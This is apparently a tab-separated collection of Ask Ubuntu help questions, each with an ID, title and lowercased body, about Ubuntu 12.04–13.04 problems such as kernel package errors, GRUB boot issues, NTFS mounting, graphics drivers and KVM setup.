291836	dpkg : error processing linux-image-3.5.0-28-generic	i have ubuntu server 12.04.2 lts installed on a server . after i run apt-get update & apt-get upgrade & apt-get dist-upgrade my kernel version has been changed to linux-image-3.5.0-28-generic . ( the original one is linux-image-3.5.0-23-generic ) however , after the above operations , when i run apt-get upgrade or apt-get autoremove or apt-get install ntp ( or other package ) , the shell prints the following error message : root @ network : /boot # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up linux-image-3.5.0-28-generic ( 3.5.0-28.48~precise1 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.5.0-28-generic /boot/vmlinuz-3.5.0-28-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.5.0-28-generic /boot/vmlinuz-3.5.0-28-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.5.0-28-generic /boot/vmlinuz-3.5.0-28-generic update-initramfs : generating /boot/initrd.img-3.5.0-28-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.5.0-28-generic /boot/vmlinuz-3.5.0-28-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.5.0-28-generic /boot/vmlinuz-3.5.0-28-generic /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) . run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.5.0-28-generic.postinst line 1010. dpkg : error processing linux-image-3.5.0-28-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) does any one have any ideas to get this working ? ( i do n't even know what 's wrong with that ? ) or how to roll back to the previous linux kernel version ? ( since there is no problem for the previous linux-image-3.5.0-23-generic version . ) thanks !
291839	how can i stop files from oversimplifying file types ?	when i sort files by type in files , both jpeg and tiff file types are described unhelpfully as `` image '' . this oversimplification makes sorting effectively useless for me : when writing this question i considered illustrating the unhelpfulness of such simplifications by joking that we might as well just use `` document '' as a file type , an absurd notion when you imagine what sorting by type in the `` documents '' folder might look like . you 'll never guess what i found . how can i stop this foolish behavior ?
291842	how many of you have upgraded ubuntu 12.10 to 13.04	i have been using ubuntu 12.10 since opening , since april i was waiting the pop-up that tell us that there is a new version available , now i have seen this message and i have a question . how many of you have upgraded ubuntu 12.10 to 13.04 ? can you tell me what is your experience in this time ? positive and negative comments will be appreciated .
291846	evolution mapi not working in 13.04	after installing evolution-mapi in ubuntu 13.04 , i am getting this error ( evolution:8018 ) : camel-critical ** : camel_provider_list : could not load /usr/lib/evolution-data-server/camel-providers/libcamelmapi.so : libdbwrap.so : can not open shared object file : no such file or directory and evolution mapi does not show up in the list of providers when setting up emails . how do i resolve this ? my list of installed evolution packages are : tux01 : ~/downloads $ sudo dpkg-query -l | grep evolution* ii evolution 3.6.4-0ubuntu1 ii evolution-common 3.6.4-0ubuntu1 ii evolution-data-server 3.6.4-0ubuntu1 ii evolution-data-server-common 3.6.4-0ubuntu1 ii evolution-indicator 0.2.20-0ubuntu10 ii evolution-mapi 3.6.2-0ubuntu1 ii evolution-plugins 3.6.4-0ubuntu1
291849	ubuntu 13.04 not restarting	i installed 13.04 in oracle vm on windows 8 . it installed without any errors that i could see , but it fails to restart properly ; it does n't appear to be doing anything .
291850	deja-dup fails to restore home directory	i backed up my home directory with deja-dup , installed ubuntu 13.04 , and attempted to restore the files , but after chosing the date of the backup to restore and chosing the location where to put the files , i get a `` failed with an unknown error '' message : traceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1412 , in < module > with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1405 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1339 , in main restore ( col_stats ) file `` /usr/bin/duplicity '' , line 630 , in restore restore_get_patched_rop_iter ( col_stats ) ) : file `` /usr/lib/python2.7/dist-packages/duplicity/patchdir.py '' , line 522 , in write_ropaths for ropath in rop_iter : file `` /usr/lib/python2.7/dist-packages/duplicity/patchdir.py '' , line 495 , in integrate_patch_iters final_ropath = patch_seq2ropath ( normalize_ps ( patch_seq ) ) file `` /usr/lib/python2.7/dist-packages/duplicity/patchdir.py '' , line 475 , in patch_seq2ropath misc.copyfileobj ( current_file , tempfp ) file `` /usr/lib/python2.7/dist-packages/duplicity/misc.py '' , line 166 , in copyfileobj buf = infp.read ( blocksize ) file `` /usr/lib/python2.7/dist-packages/duplicity/librsync.py '' , line 80 , in read self._add_to_outbuf_once ( ) file `` /usr/lib/python2.7/dist-packages/duplicity/librsync.py '' , line 94 , in _add_to_outbuf_once raise librsyncerror ( str ( e ) ) librsyncerror : librsync error 103 while in patch cycle i tried to restore earlier backup points , but all of them fail . i installed ubuntu 12.10 again and tried to restore from there ( to have the same version of deja-dup etc . ) , same problem . any ideas how i could rescue my data ? by now , i 'm pretty desperate .
291858	why do my transparent dialogs appear glitchy , and for those unfortunate enough to have seizures ... cause problems ?	the screenshots here show what i mean by glitchy : side note : i 'm using a laptop from 2006 , with integrated 945gm graphics , so that 's probably my problem .
291860	vlc issues with monkey 's audio .ape files	i 'm running 13.04 . when i try to play .ape files in vlc , for some reason it plays only a split second then quiets repeatedly . this a screen shot of the output when run from terminal . it keeps saying buffer way too late nothing to play ... nothing to play buffer too late on this machine , other media players play vlc fine . on the same machine , in another installation , vlc in 12.10 plays ape with no issues but all other media players struggle with what i have now . please help .
291864	can not mount ntfs partition in ubuntu 13.04	after i installed ubuntu 13.04 , i ca n't mount my ntfs partition . error mounting /dev/sda5 at /media/mrxfly/xflydiskdata : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda5 '' `` /media/mrxfly/xflydiskdata '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
291865	unresponsive window in firefox ?	2.8 mhz intel pentium dual 32 bit 1 gb ram unresponsive script ( s ) running requiring force quit in firefox ; the window grays and darkens , outputs error message and eventually resumes . it has affected most requests , which is odd . i checked the running processes and there were only the two i expected , so i reinstalled firefox with sudo apt get reinstall ff and it did not solve the problem . i fully purged ff and installed again with , sudo apt-get purge firefox firefox-globalmenu firefox-gnome-support sudo apt-get install firefox firefox-globalmenu firefox-gnome-support and sudo apt-get autoremove which did not work. ' a script on this page may be busy , or it may have stopped responding . you can stop the script now , or you can continue to see if the script will complete . script : http : //cdn.sstatic.net/js/stub.js ? v=181da36f6419:3 '
291869	ubuntu 13.04 installed but always start only windows 7 and no option for ubuntu	i installed ubuntu 13.04 but system always starts windows 7 and no option for ubuntu.please help me
291872	server running on esx can ping outside and inside but can not be pinged ( or ssh ) from the inside	have identical vm 's that do not have this problem those identical machines are the only machines that can actually ping and ssh to this certain box . disabled firewall added new nic that was e1000 and not vxnet could not force this new nic to use dhcp because of socket error this host can ping everywhere , internally and externally but , can only be pinged by other ubuntu server vm 's . the other identical vm 's can be pinged across the network
291873	can i upgrade from ubuntu 12.10 to lubuntu 13.04 directly ?	i have ubuntu 12.10 installed on mypc . i 'm thinking to upgrade to 13.04 . now i 'd like to take the opportunity also to test lubuntu . should i first upgrade ubuntu , then install lubuntu or can i directly run the : sudo apt-get install lubuntu-desktop in other words , will i get lubuntu 12.10 ( my current os version ) or lubuntu 13.04 ( last available ) ?
291882	cpu frequency stays at the top even with ondemand or powersave governors	the fan goes lower but the /sys/devices ... ../cpuinfo_cur_freq and scaling_cur_freq list the highest frequency . core i5 can go down to 1.2ghz according to cpuinfo but watching the time_in_state shows it middle-of-the-roading it , with time only growing at 2ghz . what do i do ? i want low low low low freq and power .
291888	can i adjust/reduce my partition size for ubuntu ?	i 'm a brand new user to ubuntu and linux for that matter . i just installed ubuntu in a dual-boot setup and loaded all the updates i could get . during installation it asked me to set the partition sizes between ubuntu and windows vista . however , it did not differentiate which partition was which on the screen when i set them , so i gave ubuntu about 75 % of my disk space ( about 125gb compared to only 80 for vista ) . i was aiming to give ubuntu 80gb of space , and the rest to the windows partition . however , i got them backwards and ubuntu now commands the majority of space . is there a way to reduce the partition size and give the majority back to the windows partition ? can anyone point me in the right direction for giving the partitions the appropriate size also ? 80gb was a guess , so that i had room to install apps . thanks .
291889	ati driver breaks unity , fglrx or fglrx-updates	ubuntu starts and runs with the open source driver , but once i go into additional drivers and activate the fglrx or fglrx-updates proprietary drivers and restart , after i login nothing in ubuntu shows up ... other then the water mark . it appears to break unity . i have to reinstall ubuntu to get back to open-source , what is my next plan of action to get catalyst to work ? v : 13.04 a : hd 5730 ati
291900	dual boot windows 7 and ubuntu 12.10	i ca n't boot into windows 7 from grub , or ca n't boot into linux from windows 7 i have 2 hdd , on 1 i have windows 7 and on other i have linux . both hdd are working properly . help me to correct dual boot . boot info script e7fc706 + boot-repair extra info [ boot-info 31jan2013 ] ============================= boot info summary : =============================== = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sda . = > grub2 ( v2.00 ) is installed in the mbr of /dev/sdb and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 1 for ( , msdos1 ) /grub . = > grub2 ( v2.00 ) is installed in the mbr of /dev/sdc and looks at sector 1 of the same hard drive for core.img . core.img is at this location and uses an embedded config file : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - search.fs_uuid cb0e9d75-552c-4509-b720-d914e2375b4c root hd1 , msdos1 set prefix= ( $ root ) /grub -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- - . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows 7/2008 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows 7/2008 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows 7/2008 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda4 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows 7/2008 : ntfs boot sector info : according to the info in the boot sector , sda5 starts at sector 2048 . operating system : boot files : sda6 : __________________________________________________________________________ file system : ntfs boot sector type : windows 7/2008 : ntfs boot sector info : according to the info in the boot sector , sda6 starts at sector 2048 . operating system : boot files : sdb1 : __________________________________________________________________________ file system : ext3 boot sector type : - boot sector info : operating system : boot files : /grub/grub.cfg /grub/i386-pc/core.img sdb2 : __________________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sdb5 : __________________________________________________________________________ file system : ext3 boot sector type : - boot sector info : operating system : ubuntu 12.10 boot files : /etc/fstab sdb6 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sdb7 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdc1 : __________________________________________________________________________ file system : ntfs boot sector type : windows 7/2008 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 2,048 206,847 204,800 7 ntfs / exfat / hpfs /dev/sda2 * 206,848 272,631,807 272,424,960 7 ntfs / exfat / hpfs /dev/sda3 272,631,808 639,633,407 367,001,600 7 ntfs / exfat / hpfs /dev/sda4 639,633,408 1,953,521,663 1,313,888,256 f w95 extended ( lba ) /dev/sda5 639,635,456 1,059,065,855 419,430,400 7 ntfs / exfat / hpfs /dev/sda6 1,059,067,904 1,953,521,663 894,453,760 7 ntfs / exfat / hpfs drive : sdb _____________________________________________________________________ disk /dev/sdb : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 * 2,048 976,895 974,848 83 linux /dev/sdb2 978,942 301,758,463 300,779,522 5 extended /dev/sdb5 978,944 49,805,311 48,826,368 83 linux /dev/sdb6 49,807,360 293,945,343 244,137,984 83 linux /dev/sdb7 293,947,392 301,758,463 7,811,072 82 linux swap / solaris drive : sdc _____________________________________________________________________ disk /dev/sdc : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdc1 * 63 488,392,064 488,392,002 7 ntfs / exfat / hpfs '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 323ad4403ad3ff33 ntfs system reserved /dev/sda2 ec44e6e344e6af8e ntfs windows 7 /dev/sda3 6c2478182477e38c ntfs softwares /dev/sda5 54b6b371b6b351ea ntfs games /dev/sda6 3a04c1f004c1af67 ntfs movies /dev/sdb1 6570258e-4efb-4cdb-91af-5bd97ff51912 ext3 /dev/sdb5 543b5815-ffa5-4c88-b172-98587aca26ee ext3 /dev/sdb6 083db3df-5599-4f0b-94d6-1d6ea52ece6e ext4 /dev/sdb7 92d881dc-4a65-4b0a-aeac-62661734083b swap /dev/sdc1 aad80849d80815eb ntfs other ================================ mount points : ================================= device mount_point type options /dev/sda3 /media/softwares fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sda5 /media/games fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sda6 /media/dhananjay/movies fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sdb5 / ext3 ( rw , errors=remount-ro ) /dev/sdb6 /home ext4 ( rw ) /dev/sdc1 /media/other fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 )
291902	accidentally deleted /etc/apt/apt.conf.d	i accidentally deleted the apt.conf.d folder and cant install ( use the apt-get ) anything = ( . when i try to locate the apt.conf.d in the apt folder , its no longer there . edit : when i open the apt folder only sources.list can be found ... : ( so that means that the apt.conf.d is not the only thing missing in the folder// the main question is : how can i recreate/restore/retrieve the whole apt folder ? additional : while using apt-get in the terminal , i always get the error w : unable to read /etc/apt/apt.conf.d/ - directoryexists ( 2 : no such file or directory ) '' w : unable to read /etc/apt/preferences.d/ - directoryexists ( 2 : no such file or directory ) i 'm using ubuntu 12.04 its not in the trash because i used root acces via terminal ( so its deleted permanently , unfortunately ) edit the apt.conf.d folder has been recreated .. but how about the preferences.d ? what type of file should i recreate ? ( by the way , what is the defaultcontent of the preferences.d and apt.conf.d ) please help ! all answers would be appreciated fully / :
291903	ubuntu not is hibernating when lid is closed	i use ubuntu 12.04 in my laptop . i 'm trying to configure to hibernate when lid is closed . however , not is working . i did the following steps to solve the problem : i enable in /etc/polkit-1/localauthority/50-local.d/com.ubuntu.enable-hibernate.pkla system settings - power i used the dconf editor . when i lid closed instead hibernate is suspend . i try run sudo pm-hibernate and works fine . any suggestion ?
291904	missed power est . column in powertop ?	i used powertop v.2.1 under ubuntu 12.04 but it missed the power est . column . it 's the same situation as described hereâ and that bug is supposed to be fixed already . i tried lm_sensors but it did n't give any voltage reading . here 's a log for sensors-detect and sesnors . i am uncertain what caused the problem . i am running linux kernel 3.2.0-23-generic , ubuntu 12.04 distro on lenovo thinkpad machine . are there any other linux utility to monitor power consumption for different devices ?
291905	how can i make ubuntu the default boot option on a newer laptop ( uefi ) ?	i have a hp spectre xt that i installed ubuntu on . i have turned `` secure boot '' off and turned on `` legacy support '' in the settings . this laptop has uefi and it always boots to windows 8 rather than the grub menu . to boot ubuntu , i have to go to `` select boot device '' and select the `` ubuntu '' option , which will take me to the grub menu . how can i get it to boot into ubuntu by default ?
291907	grub rescue error on installed ubuntu 13.04 with my windows 8 pro . i tried to merge a partition of e drive that was not my os drive	i have installed ubuntu 13.04 on my windows 8 pro of hp dv6 7012tx . when i am opening my laptop , its showing these error before showing windows 8 logo . error : unknown filesystem . grub rescue > please help me to solve my problem as hp customer care told me to format my entire laptop what i do n't wan na do . help me to resolve or uninstalled ubuntu via commandline . thanks .
291910	how to capture desktop sounds ( pulse audio output ) from avconv ?	i 've tried : avconv -f alsa -i pulse recod.wav ..but it does n't capture anything . have any idea ? thanks !
291918	lost hdd space after reinstalling ubuntu	i had a 200gbs hdd i installed ubuntu 12.10 over my win vista but it deleted all my windows partitions and data , so i used testdisk from the livecd and recovered some of the important data not all , and i tried to use someone 's advice by better recovering them through a windows application so i tried to reinstall windows but i could n't so i reinstalled ubuntu again , but this time the file system is showing 186.3gbs only which is also shown at gparted while the first installation before recovering the files it showed 198gbs capacity , how can i get back this lost space ? p.s . when i used testdisk to recover the files , i recovered them ( pressing c to copy ) to the home folder ( / ) then i transferred them to my usb stick , could this be the reason for the lost space like a hidden folder or something ? ? ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 200.0 gb , 200049647616 bytes 255 heads , 63 sectors/track , 24321 cylinders , total 390721968 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0006b252 device boot start end blocks id system /dev/sda1 * 2048 143362047 71680000 7 hpfs/ntfs/exfat /dev/sda2 143364064 229086899 42861418 7 hpfs/ntfs/exfat /dev/sda3 229086905 390716864 80814980 f w95 ext 'd ( lba ) /dev/sda5 229086968 321251804 46082418+ 7 hpfs/ntfs/exfat /dev/sda6 321251868 390716864 34732498+ 7 hpfs/ntfs/exfat disk /dev/sdb : 4022 mb , 4022337024 bytes 255 heads , 63 sectors/track , 489 cylinders , total 7856127 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x68626862 device boot start end blocks id system /dev/sdb1 * 38 7839719 3919841 b w95 fat32
291921	kvm/virt-manager fails to find/load roms	i 'm trying to create a windows 7 kvm guest on ubuntu 12.04 using virt-manager . after filling in the various config options , when it goes to begin installation , i get an error box saying : unable to complete install : 'unable to read from monitor : connection reset by peer' further digging reveals log file in /var/log/libvirt/qemu/ indicating several compalaints : could not open option rom '/usr/share/qemu/vapic.bin ' : permission denied pci_add_option_rom : failed to find romfile `` pxe-virtio.rom '' could not read keymap file : 'en-us' i do n't understand what the problem with vapic.bin is - it is in the location specified and readable : ls -la /usr/share/qemu/vapic.bin -rwxr-xr-x 1 root root 9216 feb 28 11:01 /usr/share/qemu/vapic.bin* pxe-virtio.rom is also there : ls -al /usr/share/qemu-linaro/pxe-virtio.rom -rw-r -- r -- 1 root root 63488 feb 10 2012 /usr/share/qemu-linaro/pxe-virtio.rom ls -al /usr/share/qemu/pxe-virtio.rom -rw-r -- r -- 1 root root 63488 feb 10 2012 /usr/share/qemu/pxe-virtio.rom i could use some help fixing the `` permission denied '' on vapic.bin , and some help understanding where pxe-virtio.rom is expected to be found ( assuming it must be expecting someplace other than /usr/share/qemu ? ) , or how to configure that explicitly ? full log : 2013-05-07 06:27:36.780+0000 : starting up lc_all=c path=/usr/local/sbin : /usr/local/bin : /usr/bin : /usr/sbin : /sbin : /bin qemu_audio_drv=none /usr/bin/kvm -s -m pc-1.0 -enable-kvm -m 8024 -smp 2 , sockets=2 , cores=1 , threads=1 -name win7 -uuid 88384f67-0c25-62be-d564-5fb6ad182caf -nodefconfig -nodefaults -chardev socket , id=charmonitor , path=/var/lib/libvirt/qemu/win7.monitor , server , nowait -mon chardev=charmonitor , id=monitor , mode=control -rtc base=localtime -no-reboot -no-shutdown -drive file=/var/lib/libvirt/images/windows7.img , if=none , id=drive-ide0-0-0 , format=raw -device ide-drive , bus=ide.0 , unit=0 , drive=drive-ide0-0-0 , id=ide0-0-0 , bootindex=2 -drive file=/archive/iso/win7-x64-sp1.iso , if=none , media=cdrom , id=drive-ide0-1-0 , readonly=on , format=raw -device ide-drive , bus=ide.1 , unit=0 , drive=drive-ide0-1-0 , id=ide0-1-0 , bootindex=1 -netdev tap , fd=18 , id=hostnet0 -device virtio-net-pci , netdev=hostnet0 , id=net0 , mac=52:54:00 : e6:4a:49 , bus=pci.0 , addr=0x3 -chardev pty , id=charserial0 -device isa-serial , chardev=charserial0 , id=serial0 -usb -device usb-tablet , id=input0 -vnc 0.0.0.0:0 -vga std -device intel-hda , id=sound0 , bus=pci.0 , addr=0x4 -device hda-duplex , id=sound0-codec0 , bus=sound0.0 , cad=0 -device virtio-balloon-pci , id=balloon0 , bus=pci.0 , addr=0x5 char device redirected to /dev/pts/1 could not open option rom '/usr/share/qemu/vapic.bin ' : permission denied kvm : -device virtio-net-pci , netdev=hostnet0 , id=net0 , mac=52:54:00 : e6:4a:49 , bus=pci.0 , addr=0x3 : pci_add_option_rom : failed to find romfile `` pxe-virtio.rom '' could not read keymap file : 'en-us' 2013-05-07 06:27:37.413+0000 : shutting down
291924	how to customize personalized ubuntu installation including nvidia drivers	i have a computer with 12 core processors , 32 gb memory and nvidia gtx 530m graphics card . i tried to install the gnome-desktop preceded by the server-12.10 installation . it took some attempts to finally graphics work after the kernel update from 3.5 to 3.6 . but now , my desktop stops responding after some time , there are some error messages too . i guessed this is due to improper upgradation of the kernel or some other driver ( package ) . i want to prepare my own installation cd now from which i can select the mutually compatible packages one by one . is it possible ? i am really tired of getting my computer working with problems popping up one by one . any easy solutions , ( i am not very good in commands ) thanks
291925	how do i shut down x in order to install nvidia drivers/looking to install gl.h , glut.h ( opengl files )	it 's astonishingly hard to find out how to install opengl headers on ubuntu . i 've seen pointers to the opengl registry : http : //www.opengl.org/registry/ but the files do not appear to be there . i 've also see reference that the files come in the nvidia drivers . of course , the drivers supposedly are pre-loaded on the distribution , but perhaps not the developer tools . if anyone on ubuntu is listening , this is kind of a ludicrous situation . this is not wildly exotic stuff , loading the graphics libraries should be fast and easy . in fact , i might venture to suggest that these header files be included with any standard developer headers . anyway , i was trying to install the nvidia drivers with : sudo sh ./nvidia-linux-x86_64-260.19.12.run this fails because the x server is running . i want to shut down , but if i kill it , it will just restart . i tried init 1 and it did n't work . this seems more complicated than it used to be , but i 'm just not used to this distribution , any hints ? thanks !
291944	files are n't getting shared on ubuntu 12.04 lts ( samba error )	when i am trying to share any folder , following error comes in the screen : samba 's testparm returned error 1 : load smb config files from /etc/samba/smb.conf rlimit_max : increasing rlimit_max ( 1024 ) to minimum windows limit ( 16384 ) processing section `` [ printers ] '' processing section `` [ print $ ] '' loaded services file ok . warning : 'workgroup ' and 'netbios name ' must differ . how to resolve this kind of problem ?
291948	uninstall upgrade 13.04	can i uninstall the ubuntu 13 upgrade ? it stopped about half way through the upgrade and now i get all kinds of nuisance errors . worst of all , the software center no longer functions , so i need to know how to do this through the terminal or some other way .
291952	how to set a personalized port as default in apache ?	my website work only if i run : domain.com:44400 how to set port 44400 as the default in apache ? i need have access by domain.com not domain.com:44400
291980	after 12.04 to 12.10 upgrade ( 64bit ) , xorg held back and unable to install wine	after upgrading to quantal , i wanted to install wine . however , attempting to do so results in apt wanting to remove all kinds of important packages : the following packages will be removed : libgl1-mesa-dri-lts-quantal libgl1-mesa-glx-lts-quantal libglapi-mesa-lts-quantal xserver-xorg-core-lts-quantal xserver-xorg-input-evdev-lts-quantal xserver-xorg-lts-quantal i have done extensive searching on the subject . this thread describes my problem exactly . i tried the suggested solution ( to give quantal release the highest pin ) , and while a few packages were downgraded , i am still unable to install wine . this thread seems similar , however my apt is aware of foreign architecture : $ sudo dpkg -- print-architecture amd64 $ sudo dpkg -- print-foreign-architectures i386 i read about resolving unmet dependencies , and did sudo apt-get autoclean ( which removed a bunch of stuff , presumably leftover from pangolin ) , sudo apt-get clean ( which did n't seem to remove anything ) , and the sudo apt-get -f install plus sudo dpkg -- configure -a back and forth , which showed there was still a problem : 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . so following that same thread again , running sudo apt-get -o debug : :pkgproblemresolver=yes dist-upgrade produces : broken xorg : amd64 depends on xserver-xorg [ amd64 ] < none - > 1:7.7+1ubuntu4 > ( x11 ) ( > = 1:7.7+1ubuntu4 ) considering xserver-xorg : amd64 4 as a solution to xorg : amd64 1 holding back xorg : amd64 rather than change xserver-xorg : amd64 try to re-instate ( 1 ) xorg : amd64 i ca n't find any way to fix this issue , and i 'm scared to experiment with such important libraries . finally , i found this bug report that seems to describe my problem , but the patch that resolves it is only uploaded to pangolin , so i do n't think using apt from the quantal proposed source will help me . if anyone has any advice , i 'd be so happy to hear about it ! i 've been spending many hours on this problem and not getting anywhere ... thanks very much in advance ! responses to questions : question 1 : please can you pastebin.com the output of sudo apt-get update & & sudo apt-get upgrade & & sudo apt-get dist-upgrade before you try to install wine . these commands ensure your repositories are fully up-to-date . also - do you have any ppas such as x-swat or x-edgers installed ? answer 1 : thanks for the comments ! the result of the update and upgrade commands shows xorg is held back . i do n't have any ppas . question 2 : so what is the output if you do sudo apt-get install xorg ? answer 2 : the output says i have unmet dependencies xserver-xorg ( > = 1:7.7+1ubuntu4 ) . if i run the same command with debugging on , i get a lot of information , but it does n't really make sense to me . for example , it says fixing libgl1-mesa-dri-lts-quantal : amd64 via keep of libgl1-mesa-dri : amd64 , yet if i check dpkg -- get-selections , i have only libgl1-mesa-glx-lts-quantal : amd64 not the libgl1-mesa-dri : amd64 that it looks like it wants to keep . for completeness , i 've posted my sources.list as well .
291986	why can i not deselect `` encrypt my home folder '' ?	i tried to install ubuntu 13.04 , but did n't want to encrypt my home folder . the installer does n't let me uncheck the option . why ?
291989	ca n't login to ftp after upgrading to 13.04	i 'm using vsftpd as ftp server . till upgrading 13.04 ftp worked normally , i used my user/password as ftp password . but after upgrading to 13.04 i ca n't login to ftp . i added new user to system , ca n't login to ftp with new username too . i removed the vsftpd , and installed again , same problem . how i can solve this problem ?
291992	how can we automatically merge pdf files ?	when using freepdf if i process multiple files it asks me to `` add to next pdf ? '' which appends them at the end of the last pdf name . i want it to do this automatically without user intervention ... is there any application for this ? this is being used via a batch routine so want something that i can encorperate into this routine ? ? ?
291994	how to change 32-bit operating system into 64-bit operating system without changing the operating system	i have recently installed 32-bit ubuntu 11.04 but actually my os-platform is amd 64-bit architecture.so with this i have display problem . so tell me a better way to solve this , but i am not intrusted to change my os again..is it is possible.. ? ? and i have amd radeon hd graphic card too .
292001	git get ubuntu kernel source through http proxy	i try to run below command to get kernel source code in ubuntu 12.04. git clone git : //kernel.ubuntu.com/ubuntu/ubuntu-precise.git as my machine is in a private network , i need setup a http proxy to access the public network . but even i run the command below , git still ca n't get the code . could anyone let me know how to setup the http proxy for git ? git config -- global http.proxy http : // < my proxy server > :80 regards , cy .
292003	what changes were made to unity webapps in 13.04 ?	the webapps feature introduced in 12.10 seemed like it had a lot of potential , but it also seemed like an early preview , with limited functionality and some bugs . having updated to 13.04 , it all looks the same . were any new webapps introduced , or features added or improved in the existing ones ?
292005	installation problems ubuntu 12.04 [ fixed ]	i fixed this problem by entering the advanced section of the install and creating free space by deleting the area i wanted to install ubuntu to . when i run the installation from a bootable dvd , i am given the choice to install alongside windows 7 . i click continue to select this option . i leave the partition sizes as recommended 100.6gb on the left and 93.gb5 on the right . i click install now . i get : error an error occurred whilst writing the changes to the storage devices . the resize operation has been aborted ! what 's the best course of action . sudo fdisk -l disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x307a923b device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 488394751 244093952 7 hpfs/ntfs/exfat disk /dev/sdb : 200.0 gb , 200049647616 bytes 255 heads , 63 sectors/track , 24321 cylinders , total 390721968 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x63a6579d device boot start end blocks id system /dev/sdb1 63 2047 992+ 42 sfs /dev/sdb2 2048 11573247 5785600 27 hidden ntfs winre /dev/sdb3 11573248 390719919 189573336 42 sfs
292007	gnome-control-panel crashes while trying to access online accounts	running ubuntu gnome 13.04 x64 . i set up empathy with facebook and google accounts , and i sent my pc to standby , then it showed my fb accounts was disconnected . could n't open online accounts ( of gnome ) since then . when i start gnome-control-panel via terminal , and go to online accounts , i get this : beryju @ beryju-i3 : ~/.config $ gnome-control-center online-accounts ** error : empathy-user-info.c:252 : fill_contact_info_grid : assertion failed : ( spec ! = null ) aborted ( core dumped )
